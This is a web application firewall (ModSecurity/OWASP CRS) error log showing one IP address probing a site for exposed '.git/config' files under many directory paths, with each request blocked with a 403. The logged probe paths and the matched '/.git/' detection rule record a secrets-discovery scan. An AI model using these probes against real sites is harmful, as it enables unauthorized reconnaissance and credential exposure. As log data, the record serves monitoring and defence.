[Sat Jul 29 05:51:00.042798 2023] [:error] [pid 1026833] [client 18.222.143.90:44792] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v3/.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72NgAAAAQ"]
[Sat Jul 29 05:51:00.043043 2023] [:error] [pid 1026833] [client 18.222.143.90:44792] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v3/.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72NgAAAAQ"]
[Sat Jul 29 05:51:00.043203 2023] [:error] [pid 1026833] [client 18.222.143.90:44792] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v3/.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72NgAAAAQ"]
[Sat Jul 29 05:51:00.045014 2023] [:error] [pid 1029094] [client 18.222.143.90:44822] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/v3/.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx-wAAAAc"]
[Sat Jul 29 05:51:00.045255 2023] [:error] [pid 1029094] [client 18.222.143.90:44822] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/v3/.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx-wAAAAc"]
[Sat Jul 29 05:51:00.045393 2023] [:error] [pid 1029094] [client 18.222.143.90:44822] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/v3/.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx-wAAAAc"]
[Sat Jul 29 05:51:00.057859 2023] [:error] [pid 1026830] [client 18.222.143.90:44800] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v2/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx0QAAAAE"]
[Sat Jul 29 05:51:00.058081 2023] [:error] [pid 1026830] [client 18.222.143.90:44800] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v2/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx0QAAAAE"]
[Sat Jul 29 05:51:00.058233 2023] [:error] [pid 1026830] [client 18.222.143.90:44800] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v2/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx0QAAAAE"]
[Sat Jul 29 05:51:00.059835 2023] [:error] [pid 1028943] [client 18.222.143.90:44844] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v1/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PAAAAAY"]
[Sat Jul 29 05:51:00.060065 2023] [:error] [pid 1028943] [client 18.222.143.90:44844] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v1/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PAAAAAY"]
[Sat Jul 29 05:51:00.060203 2023] [:error] [pid 1028943] [client 18.222.143.90:44844] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v1/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PAAAAAY"]
[Sat Jul 29 05:51:00.062200 2023] [:error] [pid 1026829] [client 18.222.143.90:44832] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /alpha/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/alpha/.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNowAAAAA"]
[Sat Jul 29 05:51:00.062384 2023] [:error] [pid 1026829] [client 18.222.143.90:44832] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/alpha/.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNowAAAAA"]
[Sat Jul 29 05:51:00.062511 2023] [:error] [pid 1026829] [client 18.222.143.90:44832] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/alpha/.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNowAAAAA"]
[Sat Jul 29 05:51:00.080340 2023] [:error] [pid 1026832] [client 18.222.143.90:44856] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCDwAAAAM"]
[Sat Jul 29 05:51:00.080636 2023] [:error] [pid 1026832] [client 18.222.143.90:44856] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCDwAAAAM"]
[Sat Jul 29 05:51:00.080827 2023] [:error] [pid 1026832] [client 18.222.143.90:44856] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCDwAAAAM"]
[Sat Jul 29 05:51:00.188737 2023] [:error] [pid 1026831] [client 18.222.143.90:44860] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /backup/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backup/.git/config"] [unique_id "ZMSMpNUbAgB5eIusnpmUXAAAAAI"]
[Sat Jul 29 05:51:00.189053 2023] [:error] [pid 1026831] [client 18.222.143.90:44860] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backup/.git/config"] [unique_id "ZMSMpNUbAgB5eIusnpmUXAAAAAI"]
[Sat Jul 29 05:51:00.189261 2023] [:error] [pid 1026831] [client 18.222.143.90:44860] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backup/.git/config"] [unique_id "ZMSMpNUbAgB5eIusnpmUXAAAAAI"]
[Sat Jul 29 05:51:00.202014 2023] [:error] [pid 1026837] [client 18.222.143.90:44870] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/v2/.git/config"] [unique_id "ZMSMpKNEleSPIL4joq5eowAAAAU"]
[Sat Jul 29 05:51:00.202244 2023] [:error] [pid 1026837] [client 18.222.143.90:44870] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/v2/.git/config"] [unique_id "ZMSMpKNEleSPIL4joq5eowAAAAU"]
[Sat Jul 29 05:51:00.202428 2023] [:error] [pid 1026837] [client 18.222.143.90:44870] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/v2/.git/config"] [unique_id "ZMSMpKNEleSPIL4joq5eowAAAAU"]
[Sat Jul 29 05:51:00.277028 2023] [:error] [pid 1026833] [client 18.222.143.90:44880] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /amphtml/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/amphtml/.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72NwAAAAQ"]
[Sat Jul 29 05:51:00.277272 2023] [:error] [pid 1026833] [client 18.222.143.90:44880] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/amphtml/.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72NwAAAAQ"]
[Sat Jul 29 05:51:00.277426 2023] [:error] [pid 1026833] [client 18.222.143.90:44880] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/amphtml/.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72NwAAAAQ"]
[Sat Jul 29 05:51:00.284965 2023] [:error] [pid 1029094] [client 18.222.143.90:44886] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v2/.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx_AAAAAc"]
[Sat Jul 29 05:51:00.285173 2023] [:error] [pid 1029094] [client 18.222.143.90:44886] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v2/.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx_AAAAAc"]
[Sat Jul 29 05:51:00.285310 2023] [:error] [pid 1029094] [client 18.222.143.90:44886] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v2/.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx_AAAAAc"]
[Sat Jul 29 05:51:00.294137 2023] [:error] [pid 1028943] [client 18.222.143.90:44882] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v4/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PQAAAAY"]
[Sat Jul 29 05:51:00.294461 2023] [:error] [pid 1028943] [client 18.222.143.90:44882] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v4/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PQAAAAY"]
[Sat Jul 29 05:51:00.294654 2023] [:error] [pid 1028943] [client 18.222.143.90:44882] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/user/v4/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PQAAAAY"]
[Sat Jul 29 05:51:00.306930 2023] [:error] [pid 1026830] [client 18.222.143.90:44902] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /aomanalyzer/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/aomanalyzer/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx0gAAAAE"]
[Sat Jul 29 05:51:00.307176 2023] [:error] [pid 1026830] [client 18.222.143.90:44902] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/aomanalyzer/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx0gAAAAE"]
[Sat Jul 29 05:51:00.307323 2023] [:error] [pid 1026830] [client 18.222.143.90:44902] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/aomanalyzer/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx0gAAAAE"]
[Sat Jul 29 05:51:00.312128 2023] [:error] [pid 1026829] [client 18.222.143.90:44894] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /a/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/a/.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNpAAAAAA"]
[Sat Jul 29 05:51:00.312419 2023] [:error] [pid 1026829] [client 18.222.143.90:44894] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/a/.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNpAAAAAA"]
[Sat Jul 29 05:51:00.312601 2023] [:error] [pid 1026829] [client 18.222.143.90:44894] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/a/.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNpAAAAAA"]
[Sat Jul 29 05:51:00.434279 2023] [:error] [pid 1026832] [client 18.222.143.90:44904] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/v1/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCEAAAAAM"]
